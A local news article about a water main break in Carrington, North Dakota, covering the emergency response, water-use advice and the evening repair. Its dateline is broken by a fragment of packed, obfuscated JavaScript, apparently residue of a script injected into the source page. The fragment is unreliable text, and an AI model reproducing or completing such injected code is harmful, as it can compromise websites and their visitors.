CARRINGTON, errrs|var|u0026u|referrer|tfzdb||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – A special session was held in Carrington on Monday with the community invited to attend to get informed on the condition of the water break and the water situation after a water main break occurred early March 10th, draining the city water tower.

Mayor Don Frye, along with Teresa Risovi, Dan Trosen and Paul Straley, fielded Carrington resident’s questions. The community was informed that the alarm for the break sounded around 5:00 AM Monday morning. At 8:45 AM, Mayor Frye declared a water emergency and the gates were shut down. At 9:00 AM, residents were informed by the reverse 911 system to require the community to take conservative water measures.

Water pressure was never fully lost in the city, making it appear that the system had been fixed or wasn’t broken. Mayor Frye stated that that wasn’t the case. Golden Acres and The Carrington Hospital began to report discolored water. According to Dan Trosen, Public Works Director, that’s from the build up in the pipes. The city recommends using bottled water for drinking and cooking until further notice. They recommend only using the water in emergency situations.

It was reported that the water tower lost over 200,000 gallons of water in just one hour. Water has also been reportedly turned off from both Stutsman and Ramsay counties. The city asks that citizens keep looking for updates through social media, radio and Dakota Central.

As of 7:15 PM Monday, the water break had been fixed and the water ban had been lifted. A reverse 911 call was sent to all Carrington residents to inform them of the lifted water usage ban.
